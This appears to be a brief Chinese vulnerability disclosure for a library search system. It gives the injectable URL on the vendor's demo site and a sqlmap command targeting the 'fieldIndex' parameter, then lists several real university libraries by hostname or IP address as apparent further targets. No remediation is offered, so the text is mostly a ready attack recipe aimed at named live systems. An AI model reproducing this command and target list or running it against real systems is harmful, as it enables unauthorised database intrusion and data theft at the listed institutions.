案例:
官方demo 注入点
http://demo.angke.com.cn/search/doSearch.html?typeIndex=&fieldIndex=z_class&keywordFir=TP391.41%2F3988
[root@Hacker~]# Sqlmap -u "http://demo.angke.com.cn/search/doSearch.html?typeInd ex=&fieldIndex=z_class&keywordFir=TP391.41%2F3988" -p fieldIndex
fieldIndex 参数过滤不严
嘉兴学院图书馆
wlib.zjxu.edu.cn
新疆大学图书馆
218.195.234.48
长春财经学院
218.62.46.131
南京工程学院图书馆
cd.lib.njit.edu.cn